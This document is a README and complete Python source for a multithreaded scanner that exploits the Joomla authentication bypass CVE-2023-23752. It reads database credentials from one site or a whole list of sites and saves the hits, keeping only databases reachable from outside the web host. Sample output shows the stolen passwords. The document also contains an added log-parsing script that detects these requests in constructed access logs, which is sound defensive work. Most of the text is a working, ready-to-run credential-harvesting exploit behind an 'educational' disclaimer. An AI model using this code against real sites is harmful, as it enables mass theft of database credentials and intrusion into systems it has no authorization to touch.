Joomla Authentication Bypass Vulnerability Scanner (CVE-2023-23752)

This script uses CVE-2023-23752 to check one or many Joomla instances for the authentication bypass and the information it leaks, including database credentials. It supports scanning a single URL or a whole list of URLs with multithreading.

Features:

  • CVE-2023-23752 Exploitation: Exploits the authentication bypass vulnerability for potential database credential extraction.
  • Single URL Scanning: Allows scanning of a single Joomla instance.
  • Massive Scanning: Utilizes multithreading for efficient scanning of multiple Joomla instances listed in a file.
  • Results Storage: Saves results in separate files for each scanned URL and a consolidated 'live.txt' file for successful hits.
  • User-Friendly Interface: Provides a clear and interactive user interface for ease of use.
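The requests this scanner sends are plain unauthenticated GETs to the Joomla web services API with public=true, which makes them easy to spot in web-server access logs. The following detection pass is an added example and is not part of the original script: it parses constructed combined-format log lines, flags requests for the two endpoints the script names, and marks those the server answered with a 200 and a body. The optional "index.php/" in the endpoint pattern assumes the site may route the API with URL rewriting enabled.

```python
import re
from collections import namedtuple

# Constructed sample access-log lines (combined log format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Feb/2023:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1874 "-" "Mozilla/5.0"
203.0.113.10 - - [16/Feb/2023:10:01:03 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 912 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Feb/2023:10:05:44 +0000] "GET /index.php/component/users/?view=login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.55 - - [16/Feb/2023:11:12:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 198 "-" "curl/8.0"
"""

# Combined log format: client, identity, user, [timestamp], "METHOD path protocol", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Endpoints the scanner requests. "index.php/" is optional because Joomla can also route the
# API without it when URL rewriting is enabled (assumption about the deployment, not from the script).
ENDPOINT_RE = re.compile(r'^/api/(?:index\.php/)?v1/(?:config/application|users)/?$')

# served: the server answered with 200 and a body instead of rejecting the request
Hit = namedtuple('Hit', 'ip ts path status size served')

def find_public_api_requests(log_text):
    """Return one Hit per request for the config/users endpoints carrying public=true."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        base, _, query = m['path'].partition('?')
        if ENDPOINT_RE.match(base) is None or 'public=true' not in query.lower():
            continue
        status = int(m['status'])
        size = 0 if m['size'] == '-' else int(m['size'])
        hits.append(Hit(m['ip'], m['ts'], m['path'], status, size, served=status == 200 and size > 0))
    return hits

def sources_with_served_hits(hits):
    """Client addresses that received a 200 from a leaking endpoint, with request counts."""
    counts = {}
    for h in hits:
        if h.served:
            counts[h.ip] = counts.get(h.ip, 0) + 1
    return counts

if __name__ == '__main__':
    for h in find_public_api_requests(SAMPLE_LOG):
        print(f"{h.ip:<15} {h.status} {'SERVED' if h.served else 'rejected'} {h.path}")
```

A 403 for the endpoint (the last sample line) still records an attempt worth correlating with the client address; only the 200 entries indicate the configuration was actually returned.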

Prerequisites:

  • Python 3.x
  • requests library: pip install requests
  • colorama library: pip install colorama
  • urllib3 library: pip install urllib3

Usage:

  1. Install Dependencies: Install the required libraries using pip install requests colorama urllib3.
  2. Run the script: Execute the script using python cve-2023-23752-scanner.py.
  3. Select Scan Mode: Choose either 'Single Scan' (for a single URL) or 'Massive Scan' (for multiple URLs).
  4. Provide Input: If using single scan, enter the target URL. If using massive scan, provide the path to a file containing a list of URLs.

Example (Single Scan):

python cve-2023-23752-scanner.py

[1] - Single Scan
[2] - Massive Scan

[CVE-2023-23752]: 1

IP/Domain: https://example.com

[CVE-2023-23752] - https://example.com .: [Scanning!]

[+] Domain            : https://example.com
[+] Database Type     : mysql
[+] Database Prefix   : jos_
[+] Database          : example_com_db
[+] Hostname          : localhost
[+] Username          : example_user
[+] Password          : example_password

Example (Massive Scan):

python cve-2023-23752-scanner.py

[1] - Single Scan
[2] - Massive Scan

[CVE-2023-23752]: 2

[+] IP/DOMAIN List: targets.txt

[CVE-2023-23752] - https://target1.com .: [Scanning!]
[CVE-2023-23752] - https://target2.com .: [Scanning!]
[CVE-2023-23752] - https://target3.com .: [Scanning!]

[+] Domain            : https://target1.com
[+] Database Type     : mysql
[+] Database Prefix   : jos_
[+] Database          : target1_db
[+] Hostname          : localhost
[+] Username          : target1_user
[+] Password          : target1_password

[CVE-2023-23752] - https://target2.com .: [No Sensitive Information!]

[CVE-2023-23752] - https://target3.com .: [Error!]

Disclaimer:

This script is for educational and research purposes only. Use it responsibly and ethically. Do not use it for illegal activities or against systems you are not authorized to scan.

# Updated Multithreading with default thread count of 10
# Author: Pari Malam

import os
import re
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests
import urllib3
from colorama import Fore, init

init(autoreset=True)
# Targets are requested with verify=False, so silence the per-request TLS warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

RESULTS_DIR = 'Results'
# Joomla 4 web services endpoint that returns configuration.php values without authentication (CVE-2023-23752)
CONFIG_PATH = '/api/index.php/v1/config/application?public=true'  # /api/index.php/v1/users?public=true lists users
CONFIG_KEYS = ('dbtype', 'dbprefix', 'host', 'db', 'user', 'password')
HEADERS = {
    'content-type': 'application/vnd.api+json',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
}

os.makedirs(RESULTS_DIR, exist_ok=True)


def banners():
    os.system('clear' if os.name == 'posix' else 'cls')
    print(f'{Fore.YELLOW}[CVE-2023-23752] - {Fore.GREEN}Authentication Bypass Information Leak on Joomla!')


def normalize_url(url):
    """Prefix bare hosts/IPs with http:// and drop any trailing slash."""
    url = url.strip()
    if not url.startswith(('https://', 'http://')):
        url = 'http://' + url
    return url.rstrip('/')


def extract_config(decoded_content):
    """Pull the database settings out of the JSON:API reply; None if any key is missing."""
    values = {}
    for key in CONFIG_KEYS:
        match = re.search(rf'"{key}":"(.*?)"', decoded_content)
        if match is None:
            return None
        values[key] = match.group(1)
    return values


def write_live(url, cfg):
    """Append one hit to the consolidated Results/live.txt."""
    with open(f'{RESULTS_DIR}/live.txt', 'a', encoding='utf-8') as f:
        f.write(f"[+] {url}\nDatabase Type     : {cfg['dbtype']}\nDatabase Prefix   : {cfg['dbprefix']}\n"
                f"Hostname          : {cfg['host']}\nDatabase          : {cfg['db']}\n"
                f"Username          : {cfg['user']}\nPassword          : {cfg['password']}\n\n")


def result_file_name(url):
    """Per-target file: Results/IPs_<ip>.txt for IP targets, Results/<host>.txt for domains."""
    name = re.sub(r'^https?://', '', url).rstrip('/')
    name = re.sub(r'[^A-Za-z0-9._-]', '_', name)  # colons, slashes etc. are not valid in file names
    if re.match(r'^\d{1,3}(?:\.\d{1,3}){3}(?:_\d+)?$', name):
        name = 'IPs_' + name
    return f'{RESULTS_DIR}/{name}.txt'


def scan_single_url(url=None):
    """Return (reply_body, leaked). leaked is True when database settings were found in the reply;
    an empty body with leaked=False means the request itself failed."""
    if url is None:
        url = input(f'\n{Fore.YELLOW}IP/Domain: {Fore.RESET}')
    full_url = normalize_url(url)

    print(f'\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]')
    try:
        # requests derives the Host header from the URL; setting it by hand to the full URL would be invalid
        config_response = requests.get(full_url + CONFIG_PATH, headers=HEADERS, verify=False, timeout=10)
        if config_response.status_code != 200:
            return '', False
        decoded_content = config_response.content.decode(errors='replace')
        cfg = extract_config(decoded_content)
        if cfg is None:
            return decoded_content, False  # reachable, but no database settings in the reply

        print(f'{Fore.YELLOW}\n[+] Domain            : {Fore.GREEN}{url}')
        print(f'{Fore.YELLOW}[+] Database Type     : {Fore.GREEN}{cfg["dbtype"]}')
        print(f'{Fore.YELLOW}[+] Database Prefix   : {Fore.GREEN}{cfg["dbprefix"]}')
        print(f'{Fore.YELLOW}[+] Database          : {Fore.GREEN}{cfg["db"]}')
        print(f'{Fore.YELLOW}[+] Hostname          : {Fore.GREEN}{cfg["host"]}')
        print(f'{Fore.YELLOW}[+] Username          : {Fore.GREEN}{cfg["user"]}')
        print(f'{Fore.YELLOW}[+] Password          : {Fore.GREEN}{cfg["password"]}\n')

        # Only databases reachable from outside the web host are recorded in live.txt
        if cfg['host'] not in ('localhost', '127.0.0.1'):
            write_live(url, cfg)
        return decoded_content, True
    except Exception:
        print(f'{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Failed!]')

    return '', False


def scan_multiple_urls(thread_count=10):
    url_list = input(f'\n{Fore.RED}[+] {Fore.YELLOW}IP/DOMAIN List: {Fore.RESET}')
    with open(url_list, 'r', encoding='utf-8') as f:
        urls = [normalize_url(line) for line in f if line.strip()]

    with ThreadPoolExecutor(max_workers=thread_count) as executor:
        # Map every future back to its own URL; results complete out of submission order
        futures = {executor.submit(scan_single_url, url): url for url in urls}
        for future in as_completed(futures):
            url = futures[future]
            response, sensitive_matches = future.result()
            if sensitive_matches:
                # live.txt has already been updated by scan_single_url; keep the raw reply per target
                with open(result_file_name(url), 'w', encoding='utf-8') as out:
                    out.write(response)
            elif response:
                print(f'{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]')
            else:
                print(f'{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Error!]')

    return urls


if __name__ == '__main__':
    banners()
    choice = input(f'\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}')
    if choice == '1':
        scan_single_url()
    elif choice == '2':
        thread_count = input(f'\n{Fore.YELLOW}[+] Thread Count (Default is 10): {Fore.RESET}')
        # Fall back to 10 workers on empty, non-numeric or zero input
        thread_count = int(thread_count) if thread_count.isdigit() and int(thread_count) > 0 else 10
        scan_multiple_urls(thread_count)
    else:
        print(f'\n{Fore.RED}Invalid option selected')
